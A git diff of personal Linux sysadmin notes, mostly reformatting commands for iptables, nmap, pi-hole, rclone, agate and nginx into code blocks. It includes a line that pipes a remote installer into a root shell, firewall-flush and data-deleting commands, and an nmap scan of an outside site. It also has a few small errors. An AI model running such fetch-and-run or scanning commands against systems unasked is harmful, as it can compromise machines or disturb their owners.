a/hardware/keyboard/keyboard.md +++ b/hardware/keyboard/keyboard.md @@ -6,11 +6,15 @@ tags: [ "Documentation", "keyboard" ] Set layout to British English. -> setxkbmap -layout gb +```bash +setxkbmap -layout gb +``` Or Polish with: -> setxkbmap -layout pl +```bash +setxkbmap -layout pl +``` | Language | short | |:--------|:------| @@ -19,7 +23,9 @@ Or Polish with: Set 'alt + shift', as the command which cycles through the British English, Polish and Serbian keyboard layout. -> setxkbmap -layout gb,pl,rs -option grp:alt_shift_toggle +```bash +setxkbmap -layout gb,pl,rs -option grp:alt_shift_toggle +``` ## Alt_GR @@ -33,22 +39,30 @@ Remap, e.g., the right Windows key, to Alt_Gr. Copy your keymap, e.g. if it's polish-1, then: -> cp /usr/share/kbd/keymaps/i386/qwerty/pl1.map.gz /usr/share/kbd/keymaps/*custom*.map.gz +```bash +cp /usr/share/kbd/keymaps/i386/qwerty/pl1.map.gz /usr/share/kbd/keymaps/*custom*.map.gz +``` Then change that map: -> sudo vim /usr/share/kbd/keymaps/custom.map.gz +```bash +sudo vim /usr/share/kbd/keymaps/custom.map.gz +``` --- You can switch Escape and Caps Lock with a single line: -> sudo sh -c "gunzip -c /usr/share/kbd/keymaps/i386/qwerty/pl1.map.gz | sed 's/ Escape/ PLACEHOLDER/ ; s/Caps_Lock/Escape/g ; s/PLACEHOLDER/Caps_Lock/' | gzip > /usr/share/kbd/keymaps/custom.map.gz" +```bash +sudo sh -c "gunzip -c /usr/share/kbd/keymaps/i386/qwerty/pl1.map.gz | sed 's/ Escape/ PLACEHOLDER/ ; s/Caps_Lock/Escape/g ; s/PLACEHOLDER/Caps_Lock/' | gzip > /usr/share/kbd/keymaps/custom.map.gz" +``` --- Change the default keyboard mapping to the custom map: -> echo 'KEYMAP="/usr/share/kbd/keymaps/*custom*.map.gz"' | sudo tee /etc/vconsole.conf +```bash +echo 'KEYMAP="/usr/share/kbd/keymaps/*custom*.map.gz"' | sudo tee /etc/vconsole.conf +``` Reboot to have changes take effect. diff --git a/networking/fail2ban.md b/networking/fail2ban.md index 32a3abb..0d2ab5b 100644 --- a/networking/fail2ban.md +++ b/networking/fail2ban.md @@ -4,7 +4,9 @@ tags: [ "Documentation", "Networking" ] --- # SSH Daemon Jail -> sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.d/ssh.local +```bash +sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.d/ssh.local +``` ``` [sshd] @@ -14,11 +16,17 @@ ignoreip = ::1, ::1 ``` -> sudo systemctl restart fail2ban +```bash +sudo systemctl restart fail2ban +``` -> sudo fail2ban-client status +```bash +sudo fail2ban-client status +``` -> sudo fail2ban-client status sshd +```bash +sudo fail2ban-client status sshd +``` diff --git a/networking/graph-easy.md b/networking/graph-easy.md index 023e009..3b4a7d1 100644 --- a/networking/graph-easy.md +++ b/networking/graph-easy.md @@ -4,23 +4,23 @@ tags: [ "Documentation" ] --- Set up a file like this, called `troubleshooting.txt`. -``` -[ Is there an IP address? ] -- no --> [ Check NIC driver, dmesg ] +> [ Is there an IP address? ] -- no --> [ Check NIC driver, dmesg ] +> +> [ Is there an IP address? ] -- yes --> [ Can you ping the router? ] +> +> [ Can you ping the router? ] -- no --> [ Check cables, router, and switches ] +> +> [ Can you ping the router? ] -- yes --> [ Can you ping a DNS address? ] +> +> [ Can you ping a DNS address? ] -- no --> [ Trying pinging ] +> +> [ Can you ping a DNS address? ] -- yes --> [ Traceroute ] -[ Is there an IP address? ] -- yes --> [ Can you ping the router? ] - -[ Can you ping the router? ] -- no --> [ Check cables, router, and switches ] - -[ Can you ping the router? ] -- yes --> [ Can you ping a DNS address? ] - -[ Can you ping a DNS address? ] -- no --> [ Trying pinging ] - -[ Can you ping a DNS address? ] -- yes --> [ Traceroute ] - -``` Then translate it with: -> graph-easy troubleshooting.txt --as boxart +```bash +graph-easy troubleshooting.txt --as boxart +``` ``` @@ -37,14 +37,20 @@ Then translate it with: Many options allow different displays. Try placing this in a file: -``` -[ One ] { fill: seagreen; color: white; } -- label --> [ Two ] { shape: triangle; } -[ One ] => { arrow-style: closed; } [ Three ] -[ Five ] { fill: maroon; color: yellow; } <=> [ Three ] -[ One ] .. Test\n label ..> [ Four ] -[ Three ] { border-style: dashed; } -.. Test\n label ..> { arrow-style: closed; } [ Six ] { label: Sixty\n Six\nand\nsix; } -[ Three ] <-- Test label --> { arrow-style: closed; } [ Six ] -[ Eight ] .. [ None ] { shape: none; fill: red; color: brown; } -[ no Network ] --> [ Is there an IP address? ] -``` +> [ One ] { fill: seagreen; color: white; } -- label --> [ Two ] { shape: triangle; } +> +> [ One ] => { arrow-style: closed; } [ Three ] +> +> [ Five ] { fill: maroon; color: yellow; } <=> [ Three ] +> +> [ One ] .. Test\n label ..> [ Four ] +> +> [ Three ] { border-style: dashed; } +> +> .. Test\n label ..> { arrow-style: closed; } [ Six ] { label: Sixty\n Six\nand\nsix; } +> +> [ Three ] <-- Test label --> { arrow-style: closed; } [ Six ] +> +> [ Eight ] .. [ None ] { shape: none; fill: red; color: brown; } +> +> [ no Network ] --> [ Is there an IP address? ] diff --git a/networking/iptables.md b/networking/iptables.md index c0a071b..04805b9 100644 --- a/networking/iptables.md +++ b/networking/iptables.md @@ -8,7 +8,9 @@ This is a basic Linux firewall program. Look at your firewalls: -> iptables -L +```bash +iptables -L +``` We see the output of input, output and forwarding rules. @@ -16,19 +18,27 @@ We see the output of input, output and forwarding rules. I don't need any forwarding, so I'm going to drop all forwarding: -> iptables -P FORWARD DROP +```bash +iptables -P FORWARD DROP +``` # Input Let's 'A'dd, or 'A'ppend a rule with -A. Let's drop all input from a nearby IP -> iptables -A INPUT -s -j DROP +```bash +iptables -A INPUT -s -j DROP +``` Or we can block all input from a particular port on the full Network. -> iptables -A INPUT -s -p tcp --destination-port 25 -j DROP +```bash +iptables -A INPUT -s -p tcp --destination-port 25 -j DROP +``` -> iptables -A INPUT --dport 80 -j ACCEPT +```bash +iptables -A INPUT --dport 80 -j ACCEPT +``` This allows http traffic to an Apache web server over port 80. @@ -37,11 +47,15 @@ However, rules are accepted in order - so a packet cannot be rejected and then a To delete rule 2 from the INPUT chain: -> iptables -D INPUT 3 +```bash +iptables -D INPUT 3 +``` Alternatively, you can 'I'nsert a rule at the start, rather than 'A'ppending it. -> iptables -I INPUT -s DROP +```bash +iptables -I INPUT -s DROP +``` # Catchalls @@ -53,7 +67,9 @@ The -j flag accepts ACCEPT/REJECT/DROP. The last two are identical except that Flush all existing rules with: -> iptables -F +```bash +iptables -F +``` # Examples diff --git a/networking/network_protocols.md b/networking/network_protocols.md deleted file mode 100644 index d7fb54e..0000000 --- a/networking/network_protocols.md +++ /dev/null @@ -1,94 +0,0 @@ ---- -title: "protocols" -tags: [ "Documentation", "Networking" ] ---- -# Protocols - -| TCP | UDP | ICMP | -|:-----------------|:-----------------|:------------------| -|Transmission Control Protocol | User Datagram Protocol | Internet Control Message Protocol | -| Reliable and slow. | Fast but unreliable, such as VOIP. Provides checksums. | Dirty checks such as pings. | - - - - -# Networking Addressing - -## IPv4 - -Three address ranges pertain only to private Networks, so no computer looks beyond the local router to resolve them: - - to - - to - - to - -In theory, Networks should fall within one of 3 ranges, depending upon their first octet: - -Class A 1-127 - -Class B 128 to 191 - -Class C 192 to 223 - - - -# Service Ports - -There are three types of port ranges: - -1 to 1023: Well-known and established ports. - -1024 to 49151 ICANN registered ports, used by various products, with limited oversight. - -49152 to 65535 Dynamic ports for ad hoc use. - -View a more complete list of ports with: - -> less /etc/services - - -# ip - -Show all addresses with: - -> ip a{dd{ress}} s{how} - -If a link's not present, load it with: - -sudo ip link set dev wlp3s0 up - -Add an interface to a device as so: - -> sudo ip a add dev eth1 - -See Network interfaces available on Fedora with: - -> less /etc/sysconfig/Network-scripts/ifcfg-enp2s0f0 - -or on Debian with: - -> less /etc/Network/interfaces - -Mostly, interfaces will receive automatic addresses from a DHCP server. If this hasn't happened for you, you can request a dhcp address with: - -> sudo dhclient eth1 - -View your current route to the internet with: - -> route - -... although on void this is: - -> routel - -If you don't have a route to the internet, you can manually specify the default gateway with: - -> sudo route add default gw - -... or ... - -> sudo ip route add default via - - diff --git a/networking/networking_basics.md b/networking/networking_basics.md deleted file mode 100644 index e95004a..0000000 --- a/networking/networking_basics.md +++ /dev/null @@ -1,141 +0,0 @@ ---- -title: "Networking" -tags: [ "Documentation", "Networking", "ip" ] ---- -# You - -Check how your computer connects to the net: - -> ip address show - - -``` - -1: lo: mtu 65536 qdisc noqueue state UP group default qlen 1000 - link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 - inet scope host lo - valid_lft forever preferred_lft forever - inet6 ::1/128 scope host - valid_lft forever preferred_lft forever -3: wlp3s0: mtu 1500 qdisc mq state UP group default qlen 1000 - link/ether 84:3a:4b:ca:5c:24 brd ff:ff:ff:ff:ff:ff - inet brd scope global dynamic noprefixroute wlp3s0 - valid_lft 199143sec preferred_lft 172143sec - inet6 fe80::22:5eb9:8a3a:95b2/64 scope link - valid_lft forever preferred_lft forever -4: wwp0s20u4i6: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 - link/ether fa:cd:4d:28:ec:dc brd ff:ff:ff:ff:ff:ff - inet brd scope global noprefixroute wwp0s20u4i6 - valid_lft forever preferred_lft forever - inet6 fe80::e9d3:506c:c0a9:6679/64 scope link - valid_lft forever preferred_lft forever - -``` - -That's too much output to read, so try: - -> ip address show | grep inet - -``` - - inet scope host lo - inet6 ::1/128 scope host - inet brd scope global dynamic noprefixroute wlp3s0 - inet6 fe80::22:5eb9:8a3a:95b2/64 scope link - inet brd scope global noprefixroute wwp0s20u4i6 - inet6 fe80::e9d3:506c:c0a9:6679/64 scope link - -``` - -The starting numbers tell you about the address. You just have to memorize the meanings: - -| Address Prefix | Meaning | -|:---:|:---:| -| 127.X | The computer's name for itself, for when you want to ssh into your own machine | -| ::1/128 | Same thing, with ipv6 | -| 192.168.X | A small Network address, given by a DHCP server (possibly your router) | -| 169.X | The interface to the internet wasn't given an ip address, so it's made up its own | - -# `arp-scan` - -Look around your local Network with `arp-scan`. - -> sudo arp-scan -l - -``` - -Interface: wlp3s0, type: EN10MB, MAC: 84:3a:4b:ca:5c:24, IPv4: -Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) - 0c:02:27:bc:aa:a1 Technicolor CH USA Inc. - b8:27:eb:4a:cd:d9 Raspberry Pi Foundation - dc:0b:34:94:5c:c4 LG Electronics (Mobile Communications) - -3 packets received by filter, 0 packets dropped by kernel -Ending arp-scan 1.9.7: 256 hosts scanned in 1.937 seconds (132.16 hosts/sec). 3 responded - -``` - -The interface here was `wlp3s0`. It starts with 'w', so it's a wifi card. Each internet adapter has a name, called a 'MAC address' in order to identify itself to outsiders. The first three parts of a MAC address are given by the manufacturer (like a family name), and the rest are just for that one device. - -The '' address ends in '.1', so it's probably a router. The manufacturer is 'Technicolor' (`arp-scan` has identified this from the first digits of the MAC: '0c:02:27'). - -Next is, which is labelled as a 'raspberry pi'. Finally, the '.10' address is a mobille phone. - -Mac addresses are easy to fake, so don't trust this output to keep you safe. - -# `nmap` - -Look around your entire Network from to - -> sudo nmap -F - -The `-F` means 'do this fast, by only scanning normal traffic' (ports below 1000). - -``` - -Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-09 13:52 CET -Nmap scan report for -Host is up (0.011s latency). -Not shown: 99 closed ports -PORT STATE SERVICE -80/tcp open http -MAC Address: 0C:02:27:BC:AA:A1 (Technicolor CH USA) - -Nmap scan report for -Host is up (0.0040s latency). -All 100 scanned ports on are closed -MAC Address: DC:0B:34:94:7C:C4 (LG Electronics (Mobile Communications)) - -Nmap scan report for belgradecats ( -Host is up (0.0096s latency). -Not shown: 98 closed ports -PORT STATE SERVICE -22/tcp open ssh -53/tcp open domain -MAC Address: B8:27:EB:4A:CD:D9 (Raspberry Pi Foundation) - -Nmap scan report for -Host is up (0.0000080s latency). -Not shown: 99 closed ports -PORT STATE SERVICE -22/tcp open ssh - -Nmap done: 256 IP addresses (4 hosts up) scanned in 5.34 seconds - -``` - -Network traffic is split into different types of information. Each one gets a number called a 'port'. Most of this information is dead, so only a few ports are used nowadays. - -The first one shows port 80, so you can visit it on a web browser. The next shows 53 (so it's handing out names of local computers) and 22 (so you can access it via ssh). - -You can scan outside addresses with: - -> sudo nmap facebook.com - -However, when you scan something, that machine will see you, and you may set off alerts, which then have to bother whoever's looking after that address. -So if you want to try out nmap from outside, find a place you have permission to scan (like your own external IP address), or try: - -> sudo nmap hack.me - -The hack.me website doesn't mind people scanning. - diff --git a/networking/nmap.md b/networking/nmap.md index db780eb..377f9ec 100644 --- a/networking/nmap.md +++ b/networking/nmap.md @@ -5,7 +5,9 @@ tags: [ "Documentation", "Networking" ] Example: -> nmap +```bash +nmap +``` Flags: @@ -15,7 +17,6 @@ Flags: Look for a web server, which has ports 80 and 443 open: -> nmap -p 80,443 --open - - - +```bash +nmap -p 80,443 --open +``` diff --git a/networking/pi-hole-server.md b/networking/pi-hole-server.md index 669ef71..6da73ff 100644 --- a/networking/pi-hole-server.md +++ b/networking/pi-hole-server.md @@ -6,37 +6,54 @@ tags: [ "Documentation", "Distros" ] ## Arch -> yay -S pi-hole-server +```bash +yay -S pi-hole-server +``` -> sudo systemctl enable --now pihole-FTL +```bash +sudo systemctl enable --now pihole-FTL +``` -> sudo systemctl disable --now systemd-resolved +```bash +sudo systemctl disable --now systemd-resolved +``` -> sudo rm -f /dev/shm/FTL-\* +```bash +sudo rm -f /dev/shm/FTL-\* +``` ## Debian Debian has a long, boring setup. -> sudo apt-get install wget curl net-tools gamin lighttpd lighttpd-mod-deflate - -> curl -sSL https://install.pi-hole.net | PIHOLE_SKIP_OS_CHECK=true sudo -E bash +```bash +sudo apt-get install wget curl net-tools gamin lighttpd lighttpd-mod-deflate +curl -sSL https://install.pi-hole.net | PIHOLE_SKIP_OS_CHECK=true sudo -E bash +``` # Setup -> sudo usermod -aG pihole $USER +```bash +sudo usermod -aG pihole $USER +``` Remove that google dns server. -> pihole -a setdns +```bash +pihole -a setdns +``` Disable pihole password by setting a blank password. -> pihole -a -p +```bash +pihole -a -p +``` Get a new list of blocked domains, then reload: -> pihole -g -r +```bash +pihole -g -r +``` Every so often, run `pihole -g` again (perhaps put it in crontab). @@ -44,11 +61,15 @@ Every so often, run `pihole -g` again (perhaps put it in crontab). Observe the pihole's output while you ask it a question: -> pihole -t +```bash +pihole -t +``` Then ask the question from another computer: -> dig @[ pihole ip ] archlinux.org +```bash +dig @[ pihole ip ] archlinux.org +``` ## System-Wide Setup diff --git a/networking/pip.md b/networking/pip.md index 8031a19..d7d4862 100644 --- a/networking/pip.md +++ b/networking/pip.md @@ -2,20 +2,26 @@ title: "pip" tags: [ "Documentation", "Networking" ] --- +``` Searching does not work. Install with: -> pip install [ package ] +```bash +pip install [ package ] +``` Upgrade all packages -> pip freeze --local | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip install -U +```bash +pip freeze --local | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip install -U +``` # Troubleshooting You may need a python3 package. In this case, try: -> pip3 install [ package ] +```bash +pip3 install [ package ] diff --git a/networking/rclone.md b/networking/rclone.md index ed9dc6b..cad738c 100644 --- a/networking/rclone.md +++ b/networking/rclone.md @@ -3,53 +3,77 @@ title: "rclone" tags: [ "Documentation", "Networking" ] --- The manpage's 'Synopsis' provides a fast reference. +``` We'll assume a folder in Google Drive called 'test', and local folder called 'foo'. Generate a config file with: -> rclone config +```bash +rclone config +``` Look at the contents of Google Drive: -> rclone ls gd:/ +```bash +rclone ls gd:/ +``` If rclone loses authorization: -> rclone authorization +```bash +rclone authorization +``` List only directories: -> rclone lsf -dirs-only google:/ +```bash +rclone lsf -dirs-only google:/ +``` Mount the remote location on /tmp/google with: -> rclone mount google /tmp/google +```bash +rclone mount google /tmp/google +``` Copy the contents of 'foo' to 'test'. -> rclone copy foo/ google:test +```bash +rclone copy foo/ google:test +``` Sync contents of foo and test with a progress bar (will delete Google items): -> rclone sync foo google:test -P +```bash +rclone sync foo google:test -P +``` Remove all duplicates -> rclone dedupe google:test +```bash +rclone dedupe google:test +``` Delete contets of a remote file: -> rclone delete n:test +```bash +rclone delete n:test +``` Or delete the folder and contents as well: -> rclone purge n:test +```bash +rclone purge n:test +``` Copy to and from with: -> rclone copyto google:test foo +```bash +rclone copyto google:test foo +``` or -> rclone copyto foo google:test +```bash +rclone copyto foo google:test diff --git a/networking/scraping/youtube-dl.md b/networking/scraping/youtube-dl.md index 2f79664..6947ed1 100644 --- a/networking/scraping/youtube-dl.md +++ b/networking/scraping/youtube-dl.md @@ -4,19 +4,27 @@ tags: [ "Documentation", "Scraping" ] --- Install `yt-dlp`. -> yt-dlp --write-auto-sub ** +```bash +yt-dlp --write-auto-sub ** +``` It will default to English, but you can specify another language with the flag --sub-lang: -> youtube-dl --sub-lang sv --write-auto-sub ** +```bash +youtube-dl --sub-lang sv --write-auto-sub ** +``` You can list all available subtitles with: -> yt-dlp --list-subs ** +```bash +yt-dlp --list-subs ** +``` It's also possible to skip the video and only download the subtitle if you add the flag --skip-download: -> yt-dlp --sub-lang sv --write-auto-sub --skip-download ** +```bash +yt-dlp --sub-lang sv --write-auto-sub --skip-download ** +``` ## Alternative diff --git a/networking/servers/agate.md b/networking/servers/agate.md index 35d78ea..1924850 100644 --- a/networking/servers/agate.md +++ b/networking/servers/agate.md @@ -1,58 +1,86 @@ --- -title: "agate" -tags: [ "Documentation", "Networking" ] ---- -Make sure your dns is in order. -My domain name is `malinfreeborn.com`, so put your own in there. - -Install agate by placing the binary somewhere or (on Arch): - -> yay -S agate - +title: "Agate on Arch Linux" +tags: [ "Documentation", "Networking", "Arch", "Gemini" ] --- -> sudo mkdir -p /usr/share/gemini/{certs,gemini} +Docs are [here](https://github.com/mbrubeck/agate). -> sudo useradd gemini -d /usr/share/gemini +You will need DNS set up before proceeding. -> sudo chown -R gemini:gemini /usr/share/gemini +Install agate. -> sudo su gemini +`yay -S agate` -> cd +Be root! -> echo 'Hello Gemworld!' > gemini/index.gmi +In my case the domain is 'splint.rs'. -Make a service file. +`DOMAIN1=splint.rs` -> sudo vim /etc/systemd/system/multi-user.target.wants/agate.service +You can set up any number of domain names. -Start agate once to make the certificates. +`DOMAIN2=ttrpgs.com` -> agate --content /usr/share/gemini/gemini --hostname malinfreeborn.com --lang en-GB +Make a directory to serve the gemini files from: + +`GEMDIR=/srv/gemini` + +`mkdir -p $GEMDIR/$DOMAIN1` + +`mkdir -p $GEMDIR/$DOMAIN2` + +Put at least one gemini file into the directory: ``` -[Unit] -Description=agate -After=Network.target - -[Service] -User=gemini -Type=simple -ExecStart=/usr/bin/agate --content /usr/share/gemini/gemini --hostname malinfreeborn.com --lang en-GB - -[Install] -WantedBy=default.target - +echo Welcome to $DOMAIN1 > $GEMDIR/$DOMAIN1/index.gmi +echo Welcome to $DOMAIN2 > $GEMDIR/$DOMAIN2/index.gmi ``` -> sudo systemctl daemon-reload +Set a language variable: -> sudo systemctl enable --now agate +`LANG=en_GB` +You need to run the agate command once interactively, in order to create certs: -# Redirection +``` +agate --content $GEMDIR --certs $GEMDIR/.certs \ + --addr [::]:1965 --addr + --hostname $DOMAIN1 --hostname $DOMAIN2 + --lang $LANG +``` -Indicate a permanent move by placing this file in the root of the capsule: +Once that works, it's time to make a service file; select any name for it: + +`SVFILE=st` + +``` +echo " +CONTENT=--content $GEMDIR +CERT=--certs $GEMDIR/.certs +ADDR=--addr [::]:1965 --addr +HOSTNAME=--hostname $DOMAIN1 --hostname $DOMAIN2 +LANG=--lang $LANG +" > $SVFILE.conf +``` + +Check the service file has all those variables and looks right: + +`cat $SVFILE.conf` + +Now move it into the agate config directory: + +`mv $SVFILE.conf /etc/agate/` + +And finally, start the service: + +``` +systemctl daemon-reload +systemctl enable --now agate@$SVFILE.conf +``` + +Your Gemini capsule should be available, and you should be able to see any access in the logs: + +``` +journalctl -xeu agate@$SVFILE.conf +``` -> index.gmi: 31 gemini://splint.rs diff --git a/networking/ssh/sshfs.md b/networking/ssh/sshfs.md index b7e66f0..7498b17 100644 --- a/networking/ssh/sshfs.md +++ b/networking/ssh/sshfs.md @@ -4,7 +4,9 @@ tags: [ "Documentation", "Networking" ] --- # Mount -> sshfs alfred@ +```bash +sshfs $USER@$IP_ADDRESS:$DIR +``` Various flags: @@ -13,5 +15,7 @@ Various flags: # Unmount -> fusermount3 -u Sync/Alfred +```bash +fusermount3 -u $DIR +``` diff --git a/networking/ssh/tricks.md b/networking/ssh/tricks.md index 0171423..574842e 100644 --- a/networking/ssh/tricks.md +++ b/networking/ssh/tricks.md @@ -5,17 +5,25 @@ tags: [ "Documentation", "Networking", "ssh", "tricks" ] Mount a remote filesystem locally with fuse-sshfs: -> sshfs *user*@*user* /tmp/mnt +```bash +sshfs *user*@*user* /tmp/mnt +``` Unmount with: -> fusermount -u /tmp/mnt +```bash +fusermount -u /tmp/mnt +``` Set it up on /etc/fstab with: -> sshfs#bkp@bkp.a-server.ninja:/media/store1/bkp /backup fuse defaults,allow_other,reconnect,delay_connect 0 0 +```bash +sshfs#bkp@bkp.a-server.ninja:/media/store1/bkp /backup fuse defaults,allow_other,reconnect,delay_connect 0 0 +``` Make image backup of sda1 and sda2 from one machine and pass it through ssh to another. -> for i in {1,2};do sudo dd if=/dev/sda$i | ssh -C *user*@ "dd of=/mnt/Backup/winback-oct-\"$i\".img" status=progress; done +```bash +for i in {1,2};do sudo dd if=/dev/sda$i | ssh -C *user*@ "dd of=/mnt/Backup/winback-oct-\"$i\".img" status=progress; done +``` diff --git a/networking/tor.md b/networking/tor.md index 39e602f..1d03a6a 100644 --- a/networking/tor.md +++ b/networking/tor.md @@ -5,7 +5,9 @@ tags: [ "Documentation", "Networking" ] # Get a hostname -> sudo vim /etc/tor/torrc +```bash +sudo vim /etc/tor/torrc +``` Uncomment the lines about `/var/lib/tor/hidden_services`, including port 22 (or whatever); restart tor, then go to that directory, and cat the hostname. diff --git a/networking/transmission.md b/networking/transmission.md index 491564f..fbc8dc6 100644 --- a/networking/transmission.md +++ b/networking/transmission.md @@ -9,12 +9,14 @@ It breaks a lot, so if it's not working, the problem is probably in the program. Search for 'sita sings the blues' with: -> torrench 'sita sings the blues' +```bash +torrench 'sita sings the blues' +``` Copy the magnet link. It looks like this: -`magnet:?xt=urn:btih:05547db7c0c5fbbe50f00212ee43e9cec5b006fa&dn=Sita+Sings+the+Blues+%281080P+official+release%29&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Fopen.demonii.com%3A1337&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Fexodus.desync.com%3A6969` +> magnet:?xt=urn:btih:05547db7c0c5fbbe50f00212ee43e9cec5b006fa&dn=Sita+Sings+the+Blues+%281080P+official+release%29&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Fopen.demonii.com%3A1337&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Fexodus.desync.com%3A6969 But you only need this bit (up until the `&` character): @@ -27,28 +29,40 @@ Install it then start the service. Arch Linux: -> sudo systemctl start transmission +```bash +sudo systemctl start transmission +``` Debian: -> sudo systemctl start transmission-daemon +```bash +sudo systemctl start transmission-daemon +``` Add a torrent by the .torrent file, or a magnet link, like this: -> transmission-remote -a 'magnet:?xt=urn:btih:05547db7c0c5fbbe50f00212ee43e9cec5b006fa&dn=Sita+Sings+the+Blues+%281080P+official+release%29&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Fopen.demonii.com%3A1337&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Fexodus.desync.com%3A6969' +```bash +transmission-remote -a 'magnet:?xt=urn:btih:05547db7c0c5fbbe50f00212ee43e9cec5b006fa&dn=Sita+Sings+the+Blues+%281080P+official+release%29&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Fopen.demonii.com%3A1337&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Fexodus.desync.com%3A6969' +``` -> transmission-remote -a sita.torrent +```bash +transmission-remote -a sita.torrent +``` Now let's check that the torrent's been added successfully. -> transmission-remote -l +```bash +transmission-remote -l +``` To see the torrents, go to /var/lib/transmission/Downloads If you don't have permission, either add the directory to the group made for your username, or add yourself to the `:transmission` group, or otherwise make sure that you can read that directory, and the user `transmission` can read, write and execute. E.g.: -> sudo usermod -aG transmission $USER +```bash +sudo usermod -aG transmission $USER +``` Log in again for the changes to take effect (or open a new TTY with `Ctrl+Alt+F2`). @@ -56,13 +70,17 @@ Log in again for the changes to take effect (or open a new TTY with `Ctrl+Alt+F2 If you don't want to have a file active as a torrent, get it's number with `transmission-remote -l`, then, if it were number '4', do: -> transmission-remote -t 4 -r +```bash +transmission-remote -t 4 -r +``` You can now move the file, and the torrent will not be confused. To both **r**emove **a**nd **d**elete a file, use `-rad`: -> transmission-remote -t 4 -rad +```bash +transmission-remote -t 4 -rad +``` # Moving Torrents @@ -71,5 +89,7 @@ If the file is in your home - `~` - but `transmission` is not allowed in your ho Next, find the torrent's number. You can use multiple numbers, separated with a comma: -> transmission-remote -t 3,5,8 --move /home/alice/music +```bash +transmission-remote -t 3,5,8 --move /home/alice/music +``` diff --git a/networking/troubleshooting.md b/networking/troubleshooting.md index eb61418..8c9f51d 100644 --- a/networking/troubleshooting.md +++ b/networking/troubleshooting.md @@ -7,13 +7,19 @@ tags: [ "Documentation", "Networking" ] If not, try checking out what your local Networking interfaces are, then check if they have been picked up: -> dmesg | grep eth0 +```bash +dmesg | grep eth0 +``` # Display Active Ports -> netstat -l +```bash +netstat -l +``` ...or maybe narrow it down to http: -> netstat -l | grep http +```bash +netstat -l | grep http +``` diff --git a/networking/website/nginx.md b/networking/website/nginx.md index a529713..67d0257 100644 --- a/networking/website/nginx.md +++ b/networking/website/nginx.md @@ -4,25 +4,37 @@ tags: [ "Documentation", "Networking" ] --- Install nginx: -> sudo apt-get install nginx +```bash +sudo apt-get install nginx +``` -> sudo apt-get enable --now nginx +```bash +sudo apt-get enable --now nginx +``` Put a website somewhere: -> mkdir /var/www/html/mysite/ +```bash +mkdir /var/www/html/mysite/ +``` Put an index file there: -> vim /var/www/html/mysite/index.html +```bash +vim /var/www/html/mysite/index.html +``` Make the owner `www-data` -> chown -R www-data:www-data /var/www/html/mysite/ +```bash +chown -R www-data:www-data /var/www/html/mysite/ +``` Make a configuration file for nginx: -> vim /etc/nginx/sites-available/mysite.conf +```bash +vim /etc/nginx/sites-available/mysite.conf +``` ``` @@ -37,15 +49,20 @@ server { try_files $uri $uri/ =404; } -}``` +} +``` Make the site available: -> ln -s /etc/nginx/sites-available/mysite.conf /etc/nginx/sites-enabled/ +```bash +ln -s /etc/nginx/sites-available/mysite.conf /etc/nginx/sites-enabled/ +``` Test it's working: -> nginx -t +```bash +nginx -t +``` ## Troubleshooting @@ -65,13 +82,19 @@ Buy some DNS online, then check it's working. *Once it's working*, use certbot: -> apt install certbot +```bash +apt install certbot +``` You may need to install an nginx python module: -> apt install python3-certbot-nginx +```bash +apt install python3-certbot-nginx +``` -> certbot --nginx -d *mysite.tk* --non-interactive --agree-tos -m *webmaster@email.tld* +```bash +certbot --nginx -d *mysite.tk* --non-interactive --agree-tos -m *webmaster@email.tld* +``` When you are asked about redirecting from HTTP to HTTPS, say yes (option "2"). diff --git a/networking/wifi.md b/networking/wifi.md index 14d1c99..9db41ac 100644 --- a/networking/wifi.md +++ b/networking/wifi.md @@ -6,65 +6,87 @@ tags: [ "Documentation", "Networking" ] Stats on local net usage within domain. -> iftop -p -n +```bash +iftop -p -n +``` -> whois domain.com +```bash +whois domain.com +``` Info on domain, whether it's taken, et c.: -> dig domain.com +```bash +dig domain.com +``` -> ifconfig +```bash +ifconfig +``` Versatile wifi tool: -> nmcli +```bash +nmcli +``` # Examples You want to connect to the internet. -> sudo iwconfig +```bash +sudo iwconfig +``` Get knowledge of wireless state. The output might be: -`wlp3s0 IEEE 802.11 ESSID:"Gandalf WajFaj"` +> wlp3s0 IEEE 802.11 ESSID:"Gandalf WajFaj" -`Mode:Managed Frequency:2.412 GHz Access Point: 10:05:01:90:AC:1A` +> Mode:Managed Frequency:2.412 GHz Access Point: 10:05:01:90:AC:1A -`Bit Rate=144.4 Mb/s Tx-Power=15 dBm` +> Bit Rate=144.4 Mb/s Tx-Power=15 dBm -`Retry short limit:7 RTS thr:off Fragment thr:off` +> Retry short limit:7 RTS thr:off Fragment thr:off -`Encryption key:off` +> Encryption key:off - `Power Management:on` +> Power Management:on - `Link Quality=64/70 Signal level=-46 dBm` +> Link Quality=64/70 Signal level=-46 dBm - `Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag` +> Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag - `Tx excessive retries:0 Invalid misc:363 Missed beacon` +> Tx excessive retries:0 Invalid misc:363 Missed beacon This tells you that your ESSID is 'Gandalf WajFaj', and the access point name is 10:05:...... -> nmcli radio +```bash +nmcli radio +``` You get an overview of your radio devices. You're told that eth0 deals with your ethernet and `wlan0` deals with wifi. `wlan0` is a file which represents your wifi device. -> nmcli wlan0 wifi rescan +```bash +nmcli wlan0 wifi rescan +``` 